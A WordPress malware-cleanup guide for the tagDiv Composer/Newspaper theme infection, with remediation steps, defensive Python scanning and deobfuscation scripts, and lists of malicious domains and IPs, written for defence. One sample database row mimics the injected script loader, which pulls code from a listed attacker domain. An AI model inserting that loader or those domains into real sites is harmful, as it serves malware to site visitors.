How to Clean tagDiv Composer Malware

According to the PublicWWW engine, approximately 81,513 sites use the Newspaper theme together with the tagDiv Composer plugin, and more than 4,600 of them still show signs of infection.


Try our Free site check.

How to clean a website affected by tagDiv and Newspaper vulnerabilities.

  1. Back up the infected site, database and web files included. Keep everything, suspicious files too: they are evidence of what was changed and you may need them later.
  2. Reinstall core, plugins and themes one by one, manually, from fresh downloads; do not reuse any file from the backup. wp-config.php may be restored after a quick review for injected code.
  3. Make sure the wp-content/uploads/ folder is malware-free; look for .php and .zip files, since nothing executable belongs there.
  4. Once the site works again, open the dashboard and remove any admin user you do not recognise.
  5. Back up and review the wp_options table; it will usually contain obfuscated code. Find and remove every malicious injection.
  6. Request a reindex through Google Search Console.
  7. Apply all available security updates and run PHP 7.4 or newer.
  8. Use Search Replace DB 4.1.3 to replace the malicious code inside wp_options where editing the rows by hand is impractical.
  9. Scan every site hosted on the same server for cross-site contamination. If other sites are affected, isolate them and repeat the cleanup for each one.
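As an added example for the procedure above (it is not Magefix code and not a substitute for a full malware scanner), the following Python script implements the file-system checks of steps 2 and 3 together with the file indicators listed further down this page: it lists .php and .zip files under wp-content/uploads (double extensions such as image.php.jpg included), looks for the wp-zexit and wp-swamp plugin folders and the zexit.zip archive, and compares the three core JavaScript paths against SHA-256 hashes taken from a clean WordPress download of the same version. The sample tree it builds, the file contents and the "known good" hash map are constructed for the demo; whether wp-includes/script-loader.js exists in a clean install is an assumption encoded in that map, so take the hashes from your own clean copy.

```python
"""File-system IOC sweep for the cleanup steps above (added example, not
Magefix code). Three checks: executables under wp-content/uploads, the rogue
plugin folders/archive named on this page, and the listed core JavaScript
paths compared by SHA-256 against hashes from a clean WordPress download.
The sample tree and its known-good hashes are constructed for the demo."""
import hashlib
import json
import tempfile
from pathlib import Path

UPLOAD_BAD_SUFFIXES = {".php", ".zip"}       # nothing executable belongs in uploads
ROGUE_PLUGIN_DIRS = {"wp-zexit", "wp-swamp"}
ROGUE_ARCHIVES = {"zexit.zip"}
CORE_JS_TO_VERIFY = [
    "wp-admin/js/custom-header.js",
    "wp-includes/script-loader.js",
    "wp-includes/js/wp-custom-header.js",
]


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_upload_executables(root: Path) -> list:
    """Any .php/.zip under uploads, including double extensions (x.php.jpg)
    that a misconfigured server may still hand to the PHP interpreter."""
    uploads = root / "wp-content" / "uploads"
    hits = [p for p in uploads.rglob("*")
            if p.is_file() and any(s.lower() in UPLOAD_BAD_SUFFIXES for s in p.suffixes)]
    return sorted(p.relative_to(root).as_posix() for p in hits)


def find_rogue_plugins(root: Path) -> list:
    """The dropped plugin folders, plus the zexit.zip archive wherever it sits."""
    plugins = root / "wp-content" / "plugins"
    hits = [plugins / d for d in ROGUE_PLUGIN_DIRS if (plugins / d).is_dir()]
    hits += [p for p in root.rglob("*") if p.is_file() and p.name in ROGUE_ARCHIVES]
    return sorted(p.relative_to(root).as_posix() for p in hits)


def verify_core_js(root: Path, known_good: dict) -> dict:
    """known_good maps a relative path to the SHA-256 of the clean file, or to
    None when the path is absent from the clean download (so any file found
    there was dropped by the attacker)."""
    report = {}
    for rel in CORE_JS_TO_VERIFY:
        path, expected = root / rel, known_good.get(rel)
        if not path.exists():
            report[rel] = "ok-absent" if expected is None else "missing"
        elif expected is None:
            report[rel] = "unexpected-file"
        else:
            report[rel] = "ok" if sha256_of(path) == expected else "modified"
    return report


def run_sweep(root: Path, known_good: dict) -> dict:
    return {"uploads": find_upload_executables(root),
            "rogue_plugins": find_rogue_plugins(root),
            "core_js": verify_core_js(root, known_good)}


def build_sample_tree(base: Path) -> dict:
    """Constructed sample tree with one of each indicator planted; returns the
    known-good map for it. File contents are placeholders, not real malware."""
    clean_js = b"/* clean core file */\n"
    files = {
        "wp-content/uploads/2023/10/image.jpg": b"\xff\xd8\xff",
        "wp-content/uploads/2023/10/dropper.php": b"<?php /* constructed placeholder */",
        "wp-content/uploads/cache.php.jpg": b"<?php /* double extension */",
        "wp-content/plugins/wp-zexit/wp-zexit.php": b"<?php /* rogue plugin */",
        "wp-content/zexit.zip": b"PK",
        "wp-admin/js/custom-header.js": clean_js,
        "wp-includes/script-loader.js": b"/* dropped file */",
        "wp-includes/js/wp-custom-header.js": clean_js + b"/* appended injection */\n",
    }
    for rel, data in files.items():
        (base / rel).parent.mkdir(parents=True, exist_ok=True)
        (base / rel).write_bytes(data)
    clean_hash = hashlib.sha256(clean_js).hexdigest()
    return {"wp-admin/js/custom-header.js": clean_hash,
            "wp-includes/script-loader.js": None,   # assumed absent in the clean download
            "wp-includes/js/wp-custom-header.js": clean_hash}


def demo() -> dict:
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        return run_sweep(root, build_sample_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a real site point `run_sweep` at the document root and build `known_good` by hashing the same paths in a freshly downloaded WordPress of the version shown in the dashboard; anything reported as `modified` or `unexpected-file` is replaced from that clean copy, never edited in place.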

If you seek professional help with cleanup and security updates, check our Platinum plan (Magefix Platinum).

Malicious URLs:
https://assets.statisticscripts.com/ats/s.js
https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
https://good.playerofsunshine.com/scripts/post.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js
https://content.streamfastcdn.com

Malicious IPs: 45.140.146.101, 185.39.206.161, and the range 80.66.79.247 to 80.66.79.253 (Hyper Hosting SRL).

45.140.146.101 resolves for cdn.specialtaskevents.com
45.142.212.163 (AS44477) hosts the following domains:
assets.statisticscripts.com/ats/s.js
for.getsmallcount.com
css.statisticscripts.com
best.playerofsunshine.com
call.getsmallcount.com
five.startperfectsolutions.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
listwithstats.com
one.dataofpages.com
normal.playerofsunshine.com
dataofpages.com
good.playerofsunshine.com
statisticscripts.com
try.selectofmychoices.com
two.startperfectsolutions.com
view.listwithstats.com
js.statisticscripts.com
assets.statisticscripts.com
great.playerofsunshine.com
reget.statisticsplatform.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
new.listwithstats.com
cdn.statisticscripts.com
second.gybritanalytsesystem.com
slash.dataofpages.com
fifth.gybritanalytsesystem.com
four.startperfectsolutions.com
post.listwithstats.com
first.gybritanalytsesystem.com
first.dataofpages.com
page.listwithstats.com
one.startperfectsolutions.com
excelent.playerofsunshine.com
cdn.dataofpages.com

Malicious subdomains, grouped by the IP address they resolve to:

80.66.79.250
store.bestselllerservice.com

80.66.79.251
follow.forwardstarlight.com
stay.forwardstarlight.com
west.statisticplatform.com

80.66.79.252
service.specialcraftbox.com
call.colorschemeas.com
soft.specialcraftbox.com
get.promsmotion.com
show.bridgelinering.com
net.promsmotion.com
go.bridgelinering.com

80.66.79.253
start.selectchoise.com
finish.selectchoise.com
gate.getmygateway.com
get.lightsteper.com
cdn.specialtaskevents.com
page.specialnewspaper.com
east.statisticsplatform.com
west.statisticplatform.com
west.statisticsplatform.com

80.66.79.249
special.beatifulllhistory.com

80.66.79.248
west.statisticplatform.com
goto.betradingway.com
give.selectchoise.com
north.statisticplatform.com
got.selectchoise.com
startup.betradingway.com

80.66.79.247
call.getsmallcount.com
get.statisticplatform.com
got.statisticplatform.com
come.statisticplatform.com
bee.selectofmychoices.com
best.playerofsunshine.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
normal.playerofsunshine.com
good.playerofsunshine.com
try.selectofmychoices.com
great.playerofsunshine.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
second.gybritanalytsesystem.com
fifth.gybritanalytsesystem.com
first.gybritanalytsesystem.com
excelent.playerofsunshine.com

Other domains used to inject malware inside the "tdw-css-placeholder" section; all are blacklisted by Sucuri Labs:
fast.quickcontentnetwork.com
gll.metricaga.com
ga.cdzanalytics.com
cdn.metricastats.com
syndication.gcdnanalytics.com

fromCharCode obfuscated code inside tdw-css-placeholder (only the opening fragment is reproduced here; the pieces 'fr', 'om' and String.fromCharCode(67, ...) concatenate to the method name fromCharCode, which is then looked up with bracket notation so that the call never appears in plain text):
['fr'+'om'+String.fromCharCode(67

Malicious files and plugin folders: zexit.zip, wp-zexit, wp-swamp.
Core JavaScript paths to check as well: wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js.

Reddit thread: "wp-zexit", posted by u/cdbessig in r/WordPress.

SiteCheck (Sucuri) result for an infected site:
Malware Found. Known javascript malware: malware.injection?35.54
Known malware: malware.injection?35.59
Resource from a blacklisted domain: fast.quickcontentnetwork.com

Decoded (the recovered string table runs together in this extract; the recognizable fragments are the DOM method and property names the loader needs, such as fromCharCode, createElement, src, id, parentNode, insertBefore, getElementsByTagName, head and appendChild, the name mp_weather_script, and the payload URL):

CharCodemCharCriptateElementrcidntScriptentNodeertBeforeementsByTagNameadendChildmp_weather_scripthttps://assets.statisticscripts.com/ats/s.js
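As an added example (not code from this page, from Magefix or from Sucuri), the script below does mechanically what the fromCharCode fragment and the decoded string table above show by hand: it folds String.fromCharCode(...) calls and 'a'+'b' concatenations into literals, round after round, without ever evaluating the attacker's JavaScript, then matches any URL in the result against the domains listed on this page. The wp_options rows it scans are constructed for the demo; the injected value only mimics the structure of the real loader, and the option name tdw-css-placeholder is used as a plain row name for simplicity, whereas in a real dump the injection can sit inside a larger serialized option value, so run the scan over every row.

```python
"""Static decoder for the fromCharCode/concatenation obfuscation found in
wp_options, plus an IOC match on what it decodes to (added example, not
Magefix or Sucuri code). The attacker's JavaScript is never evaluated: the
folding rules are applied until nothing changes. Rows below are constructed."""
import re

# Subset of the domains listed on this page (assumed complete enough for the demo).
IOC_DOMAINS = {
    "assets.statisticscripts.com", "cdn.statisticscripts.com",
    "where.selectofmychoices.com", "gate.getmygateway.com",
    "west.statisticplatform.com", "good.playerofsunshine.com",
    "fast.quickcontentnetwork.com", "gll.metricaga.com",
    "ga.cdzanalytics.com", "cdn.metricastats.com",
    "syndication.gcdnanalytics.com",
}

_STR = r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\""          # one JS string literal
# String.fromCharCode(...) or String['fromCharCode'](...) with numeric arguments
_CALL = re.compile(
    r"String\s*(?:\.\s*fromCharCode|\[\s*(?:'fromCharCode'|\"fromCharCode\")\s*\])"
    r"\s*\(\s*([\d\s,]*?)\s*\)")
_CONCAT = re.compile(rf"({_STR})\s*\+\s*({_STR})")          # 'a' + 'b'
_DOMAIN = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def _unquote(lit):
    return re.sub(r"\\(.)", r"\1", lit[1:-1])


def _quote(s):
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def _fold_call(m):
    codes = [int(c) for c in m.group(1).split(",") if c.strip()]
    return _quote("".join(chr(c) for c in codes if c <= 0x10FFFF))


def _fold_concat(m):
    return _quote(_unquote(m.group(1)) + _unquote(m.group(2)))


def deobfuscate(js: str, max_rounds: int = 50) -> str:
    """Fold to a fixpoint; the round limit guards against pathological input."""
    for _ in range(max_rounds):
        folded = _CONCAT.sub(_fold_concat, _CALL.sub(_fold_call, js))
        if folded == js:
            break
        js = folded
    return js


def scan_row(option_id: int, option_name: str, option_value: str) -> dict:
    decoded = deobfuscate(option_value)
    domains = {d.lower() for d in _DOMAIN.findall(decoded)}
    ioc = sorted(domains & IOC_DOMAINS)
    obfuscated = decoded != option_value          # something was hidden behind folding
    script_tag = "<script" in decoded.lower()     # a CSS placeholder never needs a script
    verdict = "malicious" if ioc else "suspicious" if (obfuscated or script_tag) else "clean"
    return {"option_id": option_id, "option_name": option_name, "verdict": verdict,
            "ioc_domains": ioc, "decoded": decoded}


def scan_rows(rows) -> list:
    return [scan_row(*row) for row in rows]


# Constructed rows: (option_id, option_name, option_value). Row 3 mimics the
# structure of the injection (a script loader assembled from fromCharCode and
# string concatenation); it is not the real payload.
SAMPLE_ROWS = [
    (1, "blogname", "Example News"),
    (2, "tdw-css-placeholder", ".td-header-wrap{background:#fff}"),
    (3, "tdw-css-placeholder",
     "<script>var s=document['cr'+'eate'+'Element'](String['fr'+'om'+"
     "String.fromCharCode(67,104,97,114,67,111,100,101)](115,99,114,105,112,116));"
     "s['s'+'rc']='https://'+'assets.statisticscripts.com'+'/ats/s.js';"
     "document['he'+'ad']['append'+'Child'](s);</script>"),
]

if __name__ == "__main__":
    for r in scan_rows(SAMPLE_ROWS):
        print(r["option_id"], r["option_name"], r["verdict"], r["ioc_domains"])
```

Feed the script the rows of a `wp_options` dump (a `SELECT option_id, option_name, option_value FROM wp_options` export) and act on every non-clean verdict; the decoded URL in the report is the string to give Search Replace DB in step 8, and any domain that is not in the list but still loads a script from a CSS option deserves the same treatment.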

How this malware works: see the Sucuri Labs write-up "Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins".

Decoded malware: an analysis of the decoded payload was posted on Twitter by @500mk500.
